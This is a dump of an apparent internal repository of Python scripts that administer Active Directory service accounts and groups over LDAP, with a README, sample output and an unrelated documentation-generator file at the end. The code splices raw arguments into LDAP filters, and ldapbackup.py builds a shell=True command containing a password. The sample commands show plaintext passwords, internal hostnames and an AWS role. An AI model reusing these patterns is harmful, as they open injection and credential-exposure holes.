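A note on the `userAccountControl` constants used in `ldapcreateuser.py` above: the attribute is a bit field, so the script's magic numbers are just sums of standard Active Directory flags. A minimal sketch of that arithmetic (the flag names mirror Microsoft's documented constants; nothing here is part of the script itself):

```python
# userAccountControl is a bit field; the script's magic numbers decompose as:
ACCOUNTDISABLE = 0x0002         # 2
NORMAL_ACCOUNT = 0x0200         # 512
DONT_EXPIRE_PASSWORD = 0x10000  # 65536

# '514' = a normal account created in the disabled state
assert NORMAL_ACCOUNT | ACCOUNTDISABLE == 514
# '66048' = a normal, enabled account whose password never expires
assert NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD == 66048
```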
{
"alpha_fraction": 0.5645161271095276,
"alphanum_fraction": 0.5759625434875488,
"avg_line_length": 31.559322357177734,
"blob_id": "f75d088ec525a884ce056f7ff6011373f101d2b4",
"content_id": "662d8ee99dae24f2ed19cf60e52c1fce2cb1ad61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1922,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 59,
"path": "/ldapremovemember.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_DELETE\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\ngroupname = sys.argv[3]\nuser_dn = 'CN=' + username + ',' + base_dn\ngroup_dn = 'CN=' + groupname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\ngroup_search = ldap_connection.search(base_dn, '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['distinguishedName','member'])\n\n# Check the results\nif not group_search:\n print (\"Group\", groupname, \"not found in AD:\")\n sys.exit(1)\n\nfound = False\nfor dn in ldap_connection.entries[0]['member']:\n if user_dn in dn: \n found = True\nif not found: \n print (user_dn + ' is not in ' + groupname)\n sys.exit(1)\n\nmod_list = {'member': [(MODIFY_DELETE, user_dn)]}\nldap_connection.modify(group_dn, mod_list)\n\nif ldap_connection.result['result']!=0:\n Print (\"Error removing \" + username + \"from \" + groupname)\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\nprint ('Successfully removed ' + username + ' from ' + groupname)\n\n"
},
{
"alpha_fraction": 0.5473506450653076,
"alphanum_fraction": 0.5642615556716919,
"avg_line_length": 33.096153259277344,
"blob_id": "394e9342f7d674120413034d2d627f54a432f105",
"content_id": "31a67dbab3ed234bc9f2be1891d79a334680f1b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1774,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 52,
"path": "/ldapcreategroup.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core\n\ngroupname = sys.argv[1]\nbase_dn = sys.argv[2]\ndesc = sys.argv[3]\nf = open(sys.path[0] + '/config/ginfo.txt', \"rb\").read()\ninfo = f.replace(b'\\n',b'\\r\\n').decode('ascii')\ngroup_dn = 'cn=' + groupname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if group exists\nuser_search = ldap_connection.search(base_dn, '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif user_search:\n print (\"Group\", groupname, \"already exists in AD\") \n sys.exit(1)\n\nprint (info)\n\n# Lets build our group\ngroup_attrs = {'objectClass': ['group'], 'cn': groupname, \\\n 'sAMAccountName': groupname, \\\n 'groupType': '-2147483646', \\\n 'info': info, \\\n 'description': desc }\n# Add the new group\nldap_connection.add(group_dn, attributes=group_attrs)\n\nif ldap_connection.result['result'] !=0:\n print (\"Error adding new group: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n# All is good\nprint ('Successfully created ' + group_dn)\n\n"
},
{
"alpha_fraction": 0.6009280681610107,
"alphanum_fraction": 0.6156225800514221,
"avg_line_length": 29.761905670166016,
"blob_id": "4f22271944d2bf962f7a64198357575b118b9342",
"content_id": "3864e2b67179acd340caae1749f8a4e183178ad2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1293,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 42,
"path": "/ldapdelete.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core\n\nobjname = sys.argv[1]\nbase_dn = sys.argv[2]\nobjtype = sys.argv[3]\nobj_dn = 'cn=' + objname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if obj exists\nuser_search = ldap_connection.search(base_dn, '(&(name=' +\n objname +\n ')(objectClass=' + objtype + '))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (objtype, objname, \"does not exist in AD\") \n sys.exit(1)\n\n# Add the new user account\nldap_connection.delete(obj_dn)\n\nif ldap_connection.result['result'] !=0:\n print (\"Error adding new \" + objtype + \": %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n# All is good\nprint ('Successfully deleted ' + obj_dn)\n\n"
},
{
"alpha_fraction": 0.6128787994384766,
"alphanum_fraction": 0.6306818127632141,
"avg_line_length": 41.54838562011719,
"blob_id": "a4c1566a744d7f56814ce5f360805531b340f2e5",
"content_id": "b7009443583c82f00bece46b029bce476203a08c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2640,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 62,
"path": "/ldapbackup.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, datetime, configparser, boto3, subprocess\nfrom botocore.config import Config\nfrom pprint import pprint\nfrom ldap3 import Server, Connection, ALL, core\n\ndns = ['Prod','Test','SVCProd', 'SVCTest']\ndn_suffix = ',OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net'\n\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] +'/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\nawsuser = config.get('Section1', 'awsuser')\nawsdata = config.get('Section1', 'awsdata')\n\nsubprocess.run(\"/usr/local/bin/awscreds --user \" + awsuser + \" --password '\" + awsdata +\"' --role arn:aws:iam::572824850745:role/NORD-Prod_ESB-DevUsers-Team --once\", shell=True)\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e) \n sys.exit(1)\n\nfor base_dn in dns:\n user_search = ldap_connection.search('OU='+base_dn+dn_suffix, \n '(&(objectCategory=person)(objectClass=user)(name=*))')\n #attributes = ['NordSMPwData'])\n f = open(sys.path[0] + '/backup/' + datetime.date.today().isoformat() + base_dn + \".txt\", \"w\")\n for entry in ldap_connection.response:\n y = (entry.copy())\n del y['raw_dn']\n del y['raw_attributes']\n del y['type']\n f.write(str(y).replace('\\'','\"')+'\\n')\n f.close()\n\nif not user_search or len(ldap_connection.entries) < 1:\n print (\"Error: Searching for users\")\n sys.exit(1)\n\nfor base_dn in dns:\n group_search = ldap_connection.search('OU='+base_dn+dn_suffix,'(&(objectCategory=group)(name=*))',attributes = ['member','description','info'])\n f = open(sys.path[0] + '/backup/' + datetime.date.today().isoformat() + base_dn + \".txt\", \"a\")\n f.write('\\n\\n\\n\\n\\n')\n for entry in ldap_connection.response:\n y = (entry.copy())\n del y['raw_dn']\n del y['raw_attributes']\n del y['type']\n f.write(str(y).replace('\\'','\"')+'\\n')\n f.close()\n\nif not group_search or len(ldap_connection.entries) < 1:\n print (\"Error: Searching groups\")\n sys.exit(1)\n\n\nsession = boto3.Session(profile_name='nordstrom-federated')\ns3 = session.resource('s3', config=Config(proxies={'https': 'webproxy.nordstrom.net:8181','http': 'webproxy.nordstrom.net:8181'}))\nfor base_dn in dns:\n s3.meta.client.upload_file(sys.path[0] + '/backup/' + datetime.date.today().isoformat() + base_dn + \".txt\", 'prod-sxg-accessmgmt', datetime.date.today().isoformat() + base_dn + \".txt\")\n\n\n"
},
{
"alpha_fraction": 0.7829127311706543,
"alphanum_fraction": 0.7844329476356506,
"avg_line_length": 37.70588302612305,
"blob_id": "8742570d57f6b81ec8243b547ed8fb2642b29547",
"content_id": "ddd0510850858b139d28586cec5b49f963566b27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3289,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 85,
"path": "/sampleoutput.md",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "### Add a service account to a group\npython ldapaddmember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc general-availability-exttest\n### Response\n```text\nSuccessfully added dwtegc to general-availability-exttest\n```\n\n### List service account group membership\npython ldapmemberof.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc \n### Response\n```text\n[('CN=dwtegc,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net',\n {'memberOf': ['CN=general-egc-exttest,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net']})]\n```\n\n### Remove a service account from a group\npython ldapremovemember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc general-availability-exttest\n### Response\n```text\nSuccessfully removed dwtegc from general-availability-exttest\n```\n\n### Create a service account\npython ldapcreateuser.py aaatestUser My@P@zzW0rd OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net nordstrom.net 'My test description'\n### Response\n```text\nSuccessfully created cn=aaatestUser,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### Delete a service account\npython ldapdlete.py aaatestUser OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net person\n### Response\n```text\nSuccessfully deleted cn=aaatestUser,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### Create a group\npython36 ldapcreategroup.py aaaMyTestGroup2 OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net 'My description'\n### Response\n```text\nSuccessfully created cn=aaaMyTestGroup2,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### Delete a group\npython ldapdlete.py aaaMyTestGroup OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net group\n### Response\n```text\nSuccessfully deleted cn=aaaMyTestGroup,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### List group members\npython ldapmembers.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net general-availability-exttest\n### Response\n```text\n[('CN=general-availability-exttest,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net',\n {'member': ['CN=svtorder,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net']})]\n```\n\n### Set a service account's API key\npython ldapsetapi.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc MyAPIpazz\n### Response\n```text\nNordSMPwData for dwtegc was set successfully!\n```\n\n### Set a service account password\npython ldapsetpass.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net aaatestUser MudarorHqddjw18\n### Response\n```text\nActive Directory password for aaatestUser was set successfully\n```\n\n### Failed to Remove a service account from a group as it is not in the group\npython ldapremovemember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net aaatestUser general-availability-exttest\n### Response\n```text\nCN=aaatestUser,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net is not in general-availability-exttest\n```\n\n### Failed to Add a service account to a group as it is already in the group\npython ldapaddmember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc general-availability-exttest\n### Response\n```text\nCN=dwtegc,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net is already in general-availability-exttest\n```"
},
{
"alpha_fraction": 0.6230529546737671,
"alphanum_fraction": 0.636137068271637,
"avg_line_length": 31.714284896850586,
"blob_id": "21bc8570e3f5c7831082ffc3d9b3e261d0310604",
"content_id": "78f999e3c32e25e4455e21a32b3087befe0aff18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1605,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 49,
"path": "/ldapsetpass.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_REPLACE\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\npassword = sys.argv[3]\nuser_dn = 'CN=' + username + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\n\nPASSWORD_ATTR = \"unicodePwd\"\n\n# Set AD password\nunicode_pass = \"\\\"\" + password + \"\\\"\"\npassword_value = unicode_pass.encode(\"utf-16-le\")\nadd_pass = {PASSWORD_ATTR: [(MODIFY_REPLACE, [password_value])]}\n\n# Replace password\nldap_connection.modify(user_dn, add_pass)\nif ldap_connection.result['result'] == 0:\n print (\"Active Directory password for \" + username + \" was set successfully\")\nelse:\n sys.stderr.write('Error setting AD password for: ' + username + '\\n')\n sys.stderr.write('Message: ' + ldap_connection.result['description'] + '\\n')\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n\n"
},
{
"alpha_fraction": 0.5474602580070496,
"alphanum_fraction": 0.5587480664253235,
"avg_line_length": 33.78571319580078,
"blob_id": "a1de5e4b69170304032c23adf66c4aafc0bcf898",
"content_id": "42dbdb49bfda8c474afb7a1997acaca3e7268a09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1949,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 56,
"path": "/ldapaddmember.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_ADD\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\ngroupname = sys.argv[3]\nuser_dn = 'CN=' + username + ',' + base_dn\ngroup_dn = 'CN=' + groupname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn,\n '(&(name=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\nif not user_search:\n print (\"Error finding username: \" + username + \" in AD.\")\n sys.exit(1)\n\ngroup_search = ldap_connection.search(base_dn,\n '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['distinguishedName','member'])\nif not group_search:\n print (\"Error finding groupname: \" + groupname)\n sys.exit(1)\n\nfor dn in ldap_connection.entries[0]['member']:\n if user_dn in dn:\n print (user_dn + ' is already in ' + groupname)\n sys.exit(1)\n \n# Add account to group\nmod_list = {'member': [(MODIFY_ADD, user_dn)]}\nldap_connection.modify(group_dn, mod_list)\nif ldap_connection.result['result'] != 0:\n print (\"Error adding \" + username + \" to \" + groupname)\n sys.exit(1)\n\n# LDAP unbind\n#ldap_connection.unbind()\n\n# All is good\nprint ('Successfully added ' + username + ' to ' + groupname)\n\n"
},
{
"alpha_fraction": 0.5611222386360168,
"alphanum_fraction": 0.5781562924385071,
"avg_line_length": 30.125,
"blob_id": "8ada53b4032f76b4e8fad0c801a1c07d784ff457",
"content_id": "9907957a3ae2402826e5c205baf6a292e33b51a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 998,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 32,
"path": "/ldapmembers.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core\n\nbase_dn = sys.argv[1]\ngroupname = sys.argv[2]\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\ngroup_search = ldap_connection.search(base_dn,\n '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['member'])\n\n# Check the results\nif not group_search:\n print (\"Group\", groupname, \"not found in AD:\")\n sys.exit(1)\n\nprint (ldap_connection.entries[0])\n\n# LDAP unbind\nldap_connection.unbind()\n\n\n"
},
{
"alpha_fraction": 0.7972972989082336,
"alphanum_fraction": 0.7972972989082336,
"avg_line_length": 73,
"blob_id": "62041619914f3c5113e4012fc89e331b20ba9c20",
"content_id": "4f99fd7c2a8f1d39a4773a3b1a7a2dff31c48a47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 296,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 4,
"path": "/README.md",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "### ESB Gateway Access Management\n---\nESB Gateway access is managed through Active Directoy in Nord domain.Each APIs onboarded to ESB Gateway are assigned an AD group.\nEach consumer is assigned a service account create in AD. This service account is added to the groups related to AD for access.\n"
},
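The onboarding flow the README describes maps onto two of the scripts in this repository: create the service account, then add it to the API's group. Below is a hypothetical wrapper sketching that flow; the argument order is taken from `ldapcreateuser.py` and `ldapaddmember.py` as shown above, while the account name, password, and group are illustrative values borrowed from `sampleoutput.md`:

```python
import subprocess

# base DN for test service accounts, as used throughout sampleoutput.md
BASE_DN = "OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net"

def onboard(username, password, group, desc="consumer service account"):
    # ldapcreateuser.py reads: username, password, base_dn, domain, description
    subprocess.check_call(["python", "ldapcreateuser.py",
                           username, password, BASE_DN, "nordstrom.net", desc])
    # ldapaddmember.py reads: base_dn, username, groupname
    subprocess.check_call(["python", "ldapaddmember.py",
                           BASE_DN, username, group])

# illustrative values only
onboard("aaatestUser", "My@P@zzW0rd", "general-availability-exttest")
```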
{
"alpha_fraction": 0.6213459968566895,
"alphanum_fraction": 0.6342623829841614,
"avg_line_length": 32.3863639831543,
"blob_id": "25b55cc733afc5204ed93267ade92bff4b11ad88",
"content_id": "14354ef6a00e7a7dfac42c45fc1b0630e0b5e048",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1471,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 44,
"path": "/ldapsetapi.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_REPLACE\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\nuser_dn = 'CN=' + username + ',' + base_dn\nnordSMPwData = sys.argv[3]\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn, '(&(name=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\n# Set NordSMPwData value\nadd_pass = {'NordSMPwData': [(MODIFY_REPLACE, nordSMPwData)]}\n\n# Replace password\nldap_connection.modify(user_dn, add_pass)\nif ldap_connection.result['result'] == 0:\n print (\"NordSMPwData for \" + username + \" was set successfully\")\nelse:\n sys.stderr.write('Error setting NordSMPwData for: ' + username + '\\n')\n sys.stderr.write('Message: ' + ldap_connection.results['description'] + '\\n')\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n\n"
},
{
"alpha_fraction": 0.590010404586792,
"alphanum_fraction": 0.6077002882957458,
"avg_line_length": 29.967741012573242,
"blob_id": "8baa1af4ed40b3d726e872e434253cf85bbad4fc",
"content_id": "0751f5049dfd150548fb9bace348ddd2c1ac5a3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 961,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 31,
"path": "/ldapmemberof.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['memberof'])\n\n# Check the results\nif not user_search: \n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\nprint (ldap_connection.entries[0])\n\n# LDAP unbind\nldap_connection.unbind()\n\n"
}
] | 12 |
dhenderson/datadocs | https://github.com/dhenderson/datadocs | 812a99b66cfe0ba6b91afdae58ef12c91e2cc9e9 | a7575b13ac9b3c9d9e79e56ec0f977cb5f288f93 | ac62c85e230e2e767aa588292f184feec6f45cdf | refs/heads/master | 2021-01-17T07:58:44.307422 | 2016-06-13T00:50:11 | 2016-06-13T00:50:11 | 40,070,446 | 4 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5752987265586853,
"alphanum_fraction": 0.576708972454071,
"avg_line_length": 34.177547454833984,
"blob_id": "587c8330636458caa3489a3dd921135a174cff00",
"content_id": "332f23c490b91e57d40f433fd19ed981ef769429",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13473,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 383,
"path": "/makedocs.py",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport os, shutil\nfrom jinja2 import Environment, PackageLoader\nimport yaml\nimport os.path\nimport json\nimport markdown\n\nclass FieldError(Exception):\n \"\"\"\n Class to inform the user of a field error in her or\n his yaml configuration.\n \"\"\"\n def __init__(self, dataset, field):\n self.dataset = dataset\n self.field = field\n self.value = \"%s field in the %s dataset (is the %s field missing?)\" % (self.field, self.dataset, self.field)\n def __str__(self):\n return repr(self.field)\n\nclass Dataset():\n \"\"\"\n A dataset is a csv file that is either in the root /data directory or housed in\n a DataFolder anywhere in /data.\n\n Args:\n name String full name of this dataset (such as \"test.csv\")\n title String human readable title\n description String description\n \"\"\"\n def __init__(self, name, title = None, description = None):\n self.name = name\n self.title = title\n self.description = description\n self.categories = []\n\n def addCategory(self, category):\n \"\"\"\n Add a category object to the category list.\n Args:\n category Category object\n \"\"\"\n self.categories.append(category)\n\n def getFieldNames(self):\n \"\"\"\n Returns a list of field names in this dataset\n \"\"\"\n fieldNames = []\n for category in self.categories:\n for field in category.fields:\n fieldNames.append(field.name)\n return fieldNames\n\n def getHtmlName(self, appendText=None):\n \"\"\"\n Returns a string takign the file name and turning it into a\n reasonable html file name that strips white space and .csv\n\n Args:\n appendText String optional text to append to the end of the\n html file name.\n \"\"\"\n htmlName = self.name.replace(' ', '_')\n htmlName = htmlName.replace('.csv', '')\n if appendText:\n htmlName += \"_\" + appendText\n htmlName += '.html'\n return htmlName\n\n def addUncategorizedFields(self, df):\n \"\"\"\n Adds all fields that have not been documented by the user\n to a category called \"Uncategorized\" and add the\n category to this dataset.\n\n Args:\n df Pandas dataframe.\n \"\"\"\n\n # create an uncategorized category\n uncategorized = Category(\"Uncategorized\", \"Autogenerated list of fields that have not been documented.\")\n documentedFieldNames = self.getFieldNames()\n\n for fieldName in list(df.columns.values):\n if fieldName not in documentedFieldNames:\n # this field name is not documented, so\n # let's add it to the list of uncategorized\n # fields\n field = Field(fieldName)\n field.dataType = field.getDataType(df)\n\n # add the field to the category\n uncategorized.addField(field)\n\n # add the category\n self.addCategory(uncategorized)\n\n def printSelectAll(self, language = \"R\"):\n \"\"\"\n Prints code in the specified language that selects all fields\n in this dataset.\n\n Args:\n language String indicating the language to select all variables in.\n \"\"\"\n code = \"\"\n if language.lower() == \"r\":\n\n # TODO: fix last comma issue\n\n code += \"c(\\n\"\n\n for category in self.categories:\n code += \" # %s\\n\" % category.title\n\n for field in category.fields:\n code += ' \"%s\",\\n' % field.name\n code += \")\"\n elif language.lower() == \"python\":\n\n code += \"[\\n\"\n for category in self.categories:\n code += \" # %s\\n\" % category.title\n\n for field in category.fields:\n code += ' \"%s\",\\n' % field.name\n code += \"]\"\n\n return code\n\n def countFields(self):\n \"\"\"\n Counts the number of fields in this dataset.\n \"\"\"\n\n fieldCount = 0\n for category in self.categories:\n fieldCount += 
len(category.fields)\n return fieldCount\n\n\nclass Category():\n \"\"\"\n A category holds any number of fields in a dataset\n \"\"\"\n def __init__(self, title, description = None):\n \"\"\"\n Args:\n title String title\n description String description\n \"\"\"\n self.title = title\n self.description = description\n self.fields = []\n\n def addField(self, field):\n self.fields.append(field)\n\nclass Field():\n \"\"\"\n A field in a dataset.\n \"\"\"\n def __init__(self, name, description=None, private=False, transformed=False, percentNotNA=None):\n \"\"\"\n Args:\n name String field name in the dataset\n description String field description\n private Boolean indicating if a field is private or public\n transformed Boolean indicating if a field is raw (False) or has gone\n through some transformation process (True).\n percentNotNA Numeric field indicating percentage of observations not NA\n \"\"\"\n self.name = name\n self.description = description\n self.percentNotNA = percentNotNA\n self.dataType = None\n self.private = private\n self.transformed = transformed\n\n def getDataType(self, df):\n \"\"\"\n Guesses the datatype of the field of a dataframe.\n Args:\n df Pandas dataframe this field is in\n Return:\n Returns a string guessing the field's data type.\n \"\"\"\n\n # the datatype map maps pandas data types to user friendly types\n dataTypeMap = {\n \"object\" : \"Text\",\n \"int64\" : \"Numeric\",\n \"float64\" : \"Numeric\",\n \"bool\" : \"Boolean\",\n \"date\" : \"Date\",\n \"categorical\" : \"Categorical\"\n }\n\n # set the data type\n dataType = dataTypeMap[str(df[self.name].dtype)]\n\n # look for special cases where we guess a different datatype\n if \"date\" in fieldName.lower():\n dataType = dataTypeMap[\"date\"]\n # check if a text datatype is actually categorical\n elif dataType == \"Text\":\n # if there are fewer than k unique answers, then guess it's categorical\n numberOfUniqueAnswers = len(df[self.name].value_counts())\n if numberOfUniqueAnswers < 20: # TODO: This is kind of a hack, might think of a better solution\n dataType = dataTypeMap[\"categorical\"]\n\n return dataType\n\ndef generateSearch(datasets):\n \"\"\"\n Generates a JSON file that allows users to search fields across datasets.\n\n 